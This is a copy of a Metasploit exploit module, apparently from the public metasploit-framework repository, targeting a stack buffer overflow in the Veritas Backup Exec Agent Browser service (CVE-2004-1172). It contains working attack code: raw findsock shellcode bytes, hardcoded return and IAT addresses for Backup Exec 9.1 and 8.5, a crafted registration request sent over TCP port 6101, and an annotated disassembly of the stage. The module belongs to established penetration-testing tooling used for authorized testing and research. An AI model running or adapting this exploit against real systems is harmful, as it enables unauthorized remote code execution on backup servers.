Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/backupexec/name_service.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = AverageRanking
8
9
include Msf::Exploit::Remote::Tcp
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Veritas Backup Exec Name Service Overflow',
16
'Description' => %q{
17
This module exploits a vulnerability in the Veritas Backup
18
Exec Agent Browser service. This vulnerability occurs when a
19
recv() call has a length value too long for the destination
20
stack buffer. By sending an agent name value of 63 bytes or
21
more, we can overwrite the return address of the recv
22
function. Since we only have ~60 bytes of contiguous space
23
for shellcode, a tiny findsock payload is sent which uses a
24
hardcoded IAT address for the recv() function. This payload
25
will then roll the stack back to the beginning of the page,
26
recv() the real shellcode into it, and jump to it. This
27
module has been tested against Veritas 9.1 SP0, 9.1 SP1, and
28
8.6.
29
},
30
'Author' => [ 'hdm' ],
31
'License' => MSF_LICENSE,
32
'References' => [
33
[ 'CVE', '2004-1172'],
34
[ 'OSVDB', '12418'],
35
[ 'BID', '11974'],
36
[ 'URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],
37
],
38
'Privileged' => true,
39
'Payload' => {
40
'Space' => 1024,
41
'MinNops' => 512,
42
'StackAdjustment' => -3500,
43
},
44
'Platform' => %w{win},
45
'Targets' => [
46
[
47
'Veritas BE 9.1 SP0/SP1', # BackupExec 9.1 SP0/SP1 return contributed by class101
48
{
49
'Platform' => 'win',
50
'Rets' => [ 0x0142ffa1, 0x401150FF ], # [email protected] v9.1.4691.0 | [email protected]
51
},
52
],
53
[
54
'Veritas BE 8.5',
55
{
56
'Platform' => 'win',
57
'Rets' => [ 0x014308b9, 0x401138FF ], # [email protected] v8.50.3572 | [email protected] v8.50.3572
58
},
59
],
60
],
61
'DisclosureDate' => '2004-12-16',
62
'DefaultTarget' => 0,
63
'Notes' => {
64
'Reliability' => UNKNOWN_RELIABILITY,
65
'Stability' => UNKNOWN_STABILITY,
66
'SideEffects' => UNKNOWN_SIDE_EFFECTS
67
}
68
)
69
)
70
71
register_options(
72
[
73
Opt::RPORT(6101)
74
]
75
)
76
end
77
78
def exploit
79
connect
80
81
print_status("Trying target #{target.name}...")
82
83
# This will findsock/read the real shellcode (51 bytes, harcoded IAT for recv)
84
# The IAT for recv() is for bnetns, the address is shifted by 8 bits to avoid
85
# nulls: [0x00401150 -> 0x401150FF]
86
stage_code = "\xfc" * 112
87
stage_read =
88
"\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74" +
89
"\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11" +
90
"\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75"
91
92
# Configure the IAT for the recv call
93
stage_read[29, 4] = [ target['Rets'][1] ].pack('V')
94
95
# Stuff it all into one request
96
stage_code[2, stage_read.length] = stage_read
97
98
# Create the registration request
99
req =
100
"\x02\x00\x32\x00\x20\x00" + stage_code + "\x00" +
101
"1.1.1.1.1.1\x00" + "\xeb\x81"
102
103
print_status("Sending the agent registration request of #{req.length} bytes...")
104
sock.put(req)
105
106
print_status("Sending the payload stage down the socket...")
107
sock.put(payload.encoded)
108
109
print_status("Waiting for the payload to execute...")
110
select(nil, nil, nil, 2)
111
112
handler
113
disconnect
114
end
115
end
116
117
118
__END__
119
[ findsock stage ]
120
00000000 31F6 xor esi,esi
121
00000002 C1EC0C shr esp,0xc
122
00000005 C1E40C shl esp,0xc
123
00000008 89E7 mov edi,esp
124
0000000A 89FB mov ebx,edi
125
0000000C 6A01 push byte +0x1
126
0000000E 8B7424FE mov esi,[esp-0x2]
127
00000012 31D2 xor edx,edx
128
00000014 52 push edx
129
00000015 42 inc edx
130
00000016 C1E210 shl edx,0x10
131
00000019 52 push edx
132
0000001A 57 push edi
133
0000001B 56 push esi
134
0000001C B8FF501140 mov eax,0x401150ff
135
00000021 C1E808 shr eax,0x8
136
00000024 FF10 call near [eax]
137
00000026 85C0 test eax,eax
138
00000028 7907 jns 0x31
139
0000002A 89DC mov esp,ebx
140
0000002C 4E dec esi
141
0000002D 85F6 test esi,esi
142
0000002F 75E1 jnz 0x12
143
00000031 FFD7 call edi
144
145